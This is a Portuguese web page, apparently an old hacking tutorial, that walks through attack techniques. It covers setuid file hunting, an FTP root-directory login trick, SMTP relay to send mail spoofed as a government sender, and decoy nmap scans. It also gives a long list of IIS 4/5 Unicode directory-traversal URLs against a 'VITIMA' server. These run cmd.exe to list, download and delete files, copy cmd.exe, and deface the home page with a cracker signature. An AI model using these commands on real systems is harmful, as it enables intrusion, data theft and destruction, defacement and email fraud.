___________________________
 
     Não se lamente pelos dados que foram roubados ou
     perdidos sem antes se lamentar por não ter contratado 
     um profissional especializado em segurança!
_______________________________
                                                          by Claudio Rocha 

Menu
Principal
Find
FTP
Telnet
HexEncoldin
nss
Nmap/NmapNT
Nc (Netcat)
PWDCrack

Mensagem 1

Informa

BR

O caminho certo da Informação

 

Mensagem 2

SEJAM
BEM-VINDOS !

 

 
Introdução:
 
Técnicas que foram usadas no passado e em alguns casos ainda funcionam..

Atualmente invadir um sistema já não é coisa que qualquer um consegue fazer. Ao passar dos anos   os Sistemas Operacionais e protocolos de redes foram evoluindo conforme foram a parecendo os problemas. Hoje em dia já podemos fazer uma distinção dos atacantes em dois grupos, sendo o   primeiro com menos conhecimento de arquitetura de redes, protocolos e programação, e o segundo  já com muito conhecimento de arquitetura de rede, protocolos e linguagem de programação. 

O primeiro grupo geralmente usam as ferramentas criadas pelo segundo grupo e na maioria das vezes não oferecem muito perigo, mas em contra partida eles podem causar bastante danos com aprendizado de uso das ferramentas disponíveis.

O segundo grupo podemos dizer que são uma classe de elite, eles são um numero bastante inferior    ao primeiro grupo, porem podem causar grandes danos. Neste grupo estão as pessoas que obtém um conhecimento profundo de redes e protocolos e técnicas avançadas de invasões. Eles são capazes de criar suas próprias ferramentas para automatizar o processo de invasão e exploração de rede utilização linguagem de programação.  


Top of Page[Back to Top]

     
 
Comando Find:
 
Comando usado geralmente na plataforma Unix.
Procurar por todos os arquivos setuid no filesystem. Dependendo do arquivo e do modo que ele funciona, hackers podem usar arquivos com esses setuid habilitados para tentar ganhar privilegio  do root/administrador. 
  • find / -user root -perm -4000 -exec ls -ldb {} \;
  • find / -perm -4000
  • find / -type f -perm -4000 -exec ls -l {} \;

Procurar por todos os arquivos setgid no filesystem.

  • find / -group root -perm -2000 -exec ls -ldb {} \;

Procurar por arquivos escondidos que não são mostrados com o comando ls.

  • find / -name ".. " -print -xdev
  • find / -name ".*" -print -xdev |cat -v

Procurar por todos os diretórios com permissão de escrever

  • find / -perm -0777 -type -d -ls


Top of Page[Back to Top]

     
 
FTP:
 
Utilitário praticamente existente em todas as plataformas.
Explorar servidores de FTP e algo que ainda não caiu da moda. Servidores que ainda estão rodando sem as devidas atualizações correm o risco de serem atacados por métodos "antigos"   como esse abaixo.

 

  • ftp [ftp.victima.com ou (IP)]
    o servidor vai perguntar o username e password
    digita no prompt
    quote user ftp
    depois
    quote cwd ~root ou quote cwd~sys quote cwd~sysop
    depois
    quote pass ftp

* Este método só vai funcionar para servidores que ainda estão usando sistema Operacional   antigo.


Top of Page[Back to Top]

     
 
Telnet:
 
Utilitário praticamente existente em todas as plataformas.
Eu diria que  a maioria dos ataques de antigamente e dos atuais envolvem conexões de telnet. Telnet é uma das ferramentas prediletas dos hacker apos ganhar o controle da  maquina desejada. Com ela se pode comandar um servidor remotamente como se estivesse trabalhando localmente. Logo abaixo esta sendo demonstrado como o telnet é usado para acessar servidores de e-mail   para enviar e-mail com o remetente falso.

* Esse processo é conhecido como mail relay. Vários dos novos servidores de e-mail server já trazem essa função desabilitada como default.   

 

  • nslookup -q=MX vitima.com  # Comando usado para pegar informação do servidor de e-mail.
  • telnet [mail.vitima.com or IP] 25 # Comando usado para logar no servidor da vitima.

 Os comandos abaixo deverão ser entrado no prompt conforme segue.

  • HELO governo.gov.br  <digite enter>
  • MAIL FROM: presidente@governo.gov.br <digite enter>
  • RCPT TO: mane@verdadeiro.com.br <digite enter>
  • DATA <digite enter>
    <digite o conteudo do email>
    para encerrar o e-mail é só digitar um "." (ponto) na linha em branco.
  • QUIT <digite enter>


Top of Page[Back to Top]

     
 
HexEncolding:
 
Função proporcionada pelo servidores de WEbs e browsers.
Os linhas abaixo são para explorar as vulnerabilidades do IIS versao 4 e 5.

Esses exemplos são algumas opções das varias existentes para explorar o IIS.

  • www.VITIMA.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
  • www.VITIMA.com/msadc/..%255c..%255c..%255c..
    %255cwinnt/system32/cmd.exe?/c+dir+c:\
  • www.VITIMA.com/cgi-bin/..%255c..%255c..%255c..
    %255cwinnt/system32/cmd.exe?/c+dir+c:\
  • www.VITIMA.com/samples/..%255c..%255c..%255c..
    %255cwinnt/system32/cmd.exe?/c+dir+c:\
  • www.VITIMA.com/iisadmpwd/..%255c..%255c..%255c..
    %255cwinnt/system32/cmd.exe?/c+dir+c:\
  • www.VITIMA.com/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..
    %255cwinnt/system32/cmd.exe?/c+dir+c:\
  • www.VITIMA.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c..
    %255cwinnt/system32/cmd.exe?/c+dir+c:\
  • www.VITIMA.com/adsamples/..%255c..%255c..%255c..%255c..%255c..
    %255cwinnt/system32/cmd.exe?/c+dir+c:\

Caso o servidor VITIMA escolhido estiver vulnerável ao attack, uma lista do conteúdo do diretório C: será mostrada na tela. Caso você não obtenha nenhum resultado com os códigos acima, significa que servidor VITIMA escolhido já não esta mais vulnerável.

Porem se a lista do diretório C: for mostrada no seu terminal significa que o servidor esta sem as   devidas atualizações. Neste caso basta trocar alguns dos comandos das linhas acima para poder navegar pelo sistema do servidor da VITIMA. 

  • /system32/cmd.exe?/c+dir+c:\winnt 
    # Para navegar no diretório \winnt
  • /system32/cmd.exe?/c+dir+c:\cpqsys~1 
    # Para navegar no diretório \cpqsys~1
  • /system32/cmd.exe?/c+dir+d:\ 
    # Para procurar pelo webroot geralmente armazenado no drive D: (lista drive D:)
  • www.VITIMA.com/diretorio/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..  %c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.extensão  
    # Para listar arquivos desejado no diretório. desejado.
  • www.VITIMA.com/diretorio/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
    %c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20type\c%20c:\arquivo.xyz  
    # Para fazer um download de um arquivo.
  • www.VITIMA.com/diretorio/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
    %c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20del%20c:\arquivo.xyz  
    # Para deletar um arquivo qualquer.
  • www.VITIMA.com/diretorio/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
    %c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20echo%20Seu texto vai aqui!!!!!>
    %20teste.txt 
    # Para criar um arqui texto.

 

Modificando a Pagina Principal.HTML

Esta é a parte onde o *hacker faz a mudança da pagina principal da web site por outra geralmente    com a assinatura do mesmo. Para fazer isto basta somente trocar o nome do arquivo texto gerado no comando logo acima: exemplo: chame o arquivo de index.html ou index.htm. Apesar se ser um arquivo texto ele será mostrado sem problemas no browser.

Comando Copy

  • www.VITIMA.com/diretorio/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
    %c0%af..%c0%af/winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\
    cmd.exe%20C:\home\site\CMD.exe  
    # Comando copia o CMD.exe paro o d:/home/site (igual ao comando copy do windows).

Comando Echo

  • www.VITIMA.com/diretorio/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
    %c0%af..%c0%af/ home/site/CMD.exe?/c%20echo%20Assinatura do Cracker! Seu 
    servidor IIS e voce foram cracked
    >%20index.html
    # Comando escreve no arquivo index.html o texto escolhido.

Para quem esta querendo algo mais fácil e automatizado é só usar/download as ferramentas twwwscan(windows version), arirang(unix version).Use google.com ou yahoo.com para  procurar  as ferramentas na internet caso o link acima não funcione mais. 


Top of Page[Back to Top]

     
 
nss:
 
Ferramenta para testar segurança de Web Sites.

nss - http://packetstorm.decepticons.org/UNIX/scanners/nss/

Narrow Security Scanner (nss), procura por vulnerabilidades (500+) em aplicações WEB bem como serviços (RPC, FTPD IMAPD, POP3 e Linuxconf) no endereço IP especificado. 

Exemplo:
# nss -s 192.168.0.1 

* Boa ferramenta para testar a segurança de WEB site. Disponível para Unix e Windows)


Top of Page[Back to Top]

     
 
Nmap/NmapNT:
 
Ferramenta muito usada para exploração e reconhecimento.

http://www.insecure.org/nmap/ (Versão Unix [Console/GUI] - versão mais robusta)
http://www.eeye.com/html/Research/Tools/nmapNT.html   (versão Windows console)
http://sourceforge.net/projects/nmapwin (versão Windows GUI)

Ping Sweeping  

  • nmap -sP 192.168.0.1-254

O nmap envia ICMP Echo Request e TCP ACK para os hosts que estão sendo scaneado (1 - 254). O host que responder será considerado pelo nmap como ativo. 

  • nmap –sP –PT80 192.168.0.24/24 

As vezes ping (ICMP) são bloqueados pelos roteadores/firewall, então para evitar isso pode–se   Usar a opção de enviar somente um ACK. O host que responder será considerado pelo nmap   como  ativo. 

TCP Scan
  • nmap –sT 192.168.0.24

Scaneia a procura de porta TCP aberta. Esse método é facilmente detectado pela vitima.


UDP Scanning

  • nmap –sU 192.168.0.1

Esse método é bastante usado para procurar brechas em portas abertas UDP tais como       rpcinfo e Back Orifice. Um fator negativo dessa opção é a morosidade para obter as informações devido a maioria das maquinas Unix limitar o faixa de erros ICMP. Portanto, ao detectar esse  faixa  limite o próprio nmap diminui o envio de pacotes para não causar um overflow na vitima.


Stealth Scanning

  • nmap –sS –O target.com

scaneia por portar abertas com opção (-O) OS fingerprinting. 

  • nmap –sS –p 21-25,80,135-139,443 192.168.0.24
Scaneia portas especificadas com a opção -p. O nmap apresenta um resultado rápido quando se 
determina as portas desejadas para o scan.  
* Esses são métodos TCP SYN  usado e proporciona um nível menor de detecção devido ao 
3-way handshake nunca se finaliza por completo. O método consiste no envio de pacote SYN 
o qual representa o primeiro passo do processo de 3-way handshake. As porta que estiverem 
abertas responderão com um pacote de SYN|ACK Porem,o atacante retorna um pacote de RST 
ao invés de ACK, o qual termina a conexão. Com isso o nmap consegue determinar as portas
que estão ouvindo.
OS Fingerprinting
  • nmap –sS –O  target.com 
Esse opção (-O) de fingerprinting é bastante útil para aqueles que estão familiarizados com
um especifico sistema e seus bugs. Executando o nmap com essa opção de fingerprinting,
o  mesmo tenta descobrir qual Sistemas Operacional o servidor da vitima esta rodando. De 
posse do nome e versão do S.O. da vitima, fica mais fácil para o atacante procurar por bugs
e outras ferramentas para completar a evasão.

Ident Scanning

  • nmap -sT -p 80 -I -O target.com
O atacante pode procurar por um especifico processo; por exemplo, um servidor de web rodando 
com privilegio  root. Se a vitima estiver rodando identd, o atacante usando o nmap será capaz de
descobrir o dono do http daemon com a opção "-I".

Outras Opções 
  • nmap -p 25,53 -sX -P0 -D 1.2.3.4,5.6.7.8 192.168.0.100 
    # 1.2.3.4 5.6.7.8 endereço forjado do source IP
  • nmap –v target.com 
    # scaneia todas portas reservadas de TCP  *** -v = verbose on
  • nmap –v --randomize_hosts –p 80 ‘*.*.2.3-5’ 
    #  scaneia randomicamente por específica faixa de IP
  • nmap –F target.com/24 
    # executa tcp scan 
  • nmap –P0 ‘192.168.[12-30].*’ 
    # procura por hosts ativos das classes adjacentes
  • nmap –P0 192.168.0-50.0-255 
    # mesma opção usada no item anterior porem sem usar apostrofes.
    
    
    


Top of Page[Back to Top]

     
 
Nc (Netcat):
 
Ferramenta usada para fazer reconhecimento de Web server.

http://www.atstake.com/research/tools/  (Windows/*Unix)

nc -v website.com 80  # digite no prompt   GET / HTTP/1.0 ou  HEAD /HTTP/1.0 para    adquirir informações do WEB server.

*outras opções estão disponíveis no manual do netcat (nc).


Top of Page[Back to Top]

     
 
PWDCrack:
 
Ferramenta bastante útil para determinar quais as senhas que não são seguras.

http://www.atstake.com/research/lc/download.html (Windows)

O utilitário LC4 ajuda o administrador de rede tornar sua rede mais segura certificando que as senhas  utilizadas pelos usuários não sejam fácil de serem quebradas. O LC4 oferece 15 dias de uso grátis sem a opção de crack para senhas mais complexas tipo: Cl$3jdsh@. 

Esta ferramenta esta disponível para quase todas as versões do Windows e tem uma interface    (GUI) bastante amigável. 


Top of Page[Back to Top]


Retornar